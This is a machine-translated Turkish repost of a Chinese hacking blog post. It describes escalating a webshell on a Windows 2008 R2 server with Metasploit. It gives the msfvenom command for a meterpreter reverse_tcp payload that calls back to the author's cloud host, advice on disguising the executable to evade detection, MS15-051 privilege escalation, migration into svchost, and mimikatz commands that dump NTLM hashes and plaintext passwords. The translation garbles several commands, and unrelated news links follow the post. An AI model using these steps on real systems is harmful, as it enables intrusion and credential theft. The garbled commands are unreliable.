Sistem iznini ve hesabı ekleyemeyen kabuğu yükseltmek için metasploit (meterpreter) kullanın

Dün gece, arkadaşım bir 08 r2 web kabuğu yayınladı ve sistem izinleriniz varsa bir hesap ekleyemez veya karma değeri yakalayamazsınız, bu nedenle aşağıdaki

Not: 08R2'nin sistem izni MS15-051 ile yükseltildi, yerel izin yükseltme EXPLOIT, söylenecek bir şey yok

Tencent Cloud'da saatte 5 sentlik bir bulut server kiraladım ve üzerine metasploit kurdum.Tencent Cloud'un nat ortamında public ve private adresleri olduğu için, ters backdoor yapmak istediğimiz kadar portları da haritalayabiliyoruz.

Yük oluştur

msfvenom -p windows / meterpreter / reverse_tcp LHOST = genel ağ ip LPORT = 2333 -f exe -o xx.exe

Daha sonra arka kapıyı kopyalayın ve web kabuğuna yükleyin. Biri öldürüleceği için exe sonekini kullanmamanız önerilir.İkincisi, exe'nin çalışması genellikle yasaktır.

Herhangi bir formata değiştirin ve webshell'e yükleyin, çünkü webshell'de çalışan herhangi bir format sunucu tarafından bir exe olarak yürütülebilir.

Ardından izleme modülü yükünü ayarlayın

msf > exploit / multi / handler kullan

msf exploit (işleyici) > yük pencereleri / meterpreter / reverse_tcp ayarla

payload = > windows / meterpreter / reverse_tcp

msf exploit (işleyici) > lport 2333 ayarla

lport = > 2333

msf exploit (işleyici) > lhost intranet IP'sini ayarla (nat ilişkisi)

lhost = > 10.104.142.160

msf exploit (işleyici) > sömürmek

10.104.142.160:2333'te ters TCP işleyicisi başlatıldı

Yük işleyiciyi başlatma ...

Meterpreter'ın arka kapı yürütme yetkisi yalnızca sunucu yürütme yetkilisiyle aynı olabileceğinden, sistem yetkisini elde etmek için ms15-051 tarafından alınan sistem yetkisiyle arka kapıyı çalıştırın.

Bu bir ölçüm cihazı oturumu alacak

Sistem izni olmasına rağmen, karma değer tahmininin neden hala bir izin sorunu olduğunu hala bilmiyorum.

Sonra, gerçek sistem izinlerini elde etmek için arka kapıyı pencerelerdeki bir sistem sürecine enjekte etmeyi düşündüm.

816 pid değerine sahip svchost.exe'nin bir sistem işlemi olduğuna bakın ve ardından geçiş yapmayı deneyin.

Taşıma işleminden sonra, izninizin olduğunu kanıtlamak için hash'i dışa aktarabilirsiniz, ancak yakalanan şifre gerçekten boştur. Önemli değil. Artefakt mimikazını çağırmayı deneyin.

ölçüm cihazı > mimikatz yükle

Uzantı mimikatz yükleniyor başarılı.

Meterpreter'ı çalıştır > mimikatz_command -f samdump :: hashler

NTLMhash'i ilk kez okuyun

Ölçüm cihazını ikinci kez çalıştır > mimikatz_command -f sekurlsa :: searchPasswords

Ardından, burada yatacak pencerelerin düz metnini görebilir, görmek için sunucuyu bağlayabilirsiniz.

Şifrenin doğru olduğunu kanıtlarsanız, sunucuya girmezsiniz

* Kaynak: Suzumiya Mottoin düzenlendi ve yayınlandı

Orijinal makale, yazar: Moto, http: //www.mottoin.com/article/web/85907.html adresinden yeniden üretilmiştir.

Dikkatli olun, üniversiteye giriş sınavı dolandırıcılığına aldanmayın! Adayların velilerine hatırlatın
önceki
Süper çalışan tasarım + dahili 4 fan! Nubia siyah teknoloji konseptli oyun telefonunu piyasaya sürdü
Sonraki
Tanıdık ama farklı bir zevkle
Kim daha güçlü, Diao Chan ve Luna?
Mart ayının ilk gününde Bai Baihe'ye mutlu yıllar!
Zhou Zongwei, Arizona Eyalet Üniversitesi: U-Net Çalışması Mevcut Segmentasyon Ağı İnovasyonu | AI Araştırma Enstitüsü 74 Konferans Salonu
Yeni bir mağaza açmak ve yeni bir telefon başlatmak: Xiaomi, MWC konferansına boşuna gitmedi
Yılın sonunda Büyük Şeytan olmalı! YEEZY BOOST 350 V2 "Mavi Ton" sürüm bilgisi açığa çıktı
2017 Volkswagen Lavida 180TSI'yi test etmek için her şey hazır
"Güzel görünümlü ve sağlam gövdeli" Xiaomi Mi 9 resmi olarak duyuruldu ve yetkili de bu sırları açıkladı
Akıllı saatler, bilgisayar korsanlarının çocukları izlemesine ve izlemesine olanak tanır
Cao Cao tarafından önerilen
Şubat ayında, anakara filmlerinin gişesi 11 milyar kırdı ve bu, küresel film tarihinde bir rekor kırdı!
Üniversiteye giriş sınav odasının fiyatı arttı ve iki gün boyunca iki bin yuan harcamak yaygındır.
To Top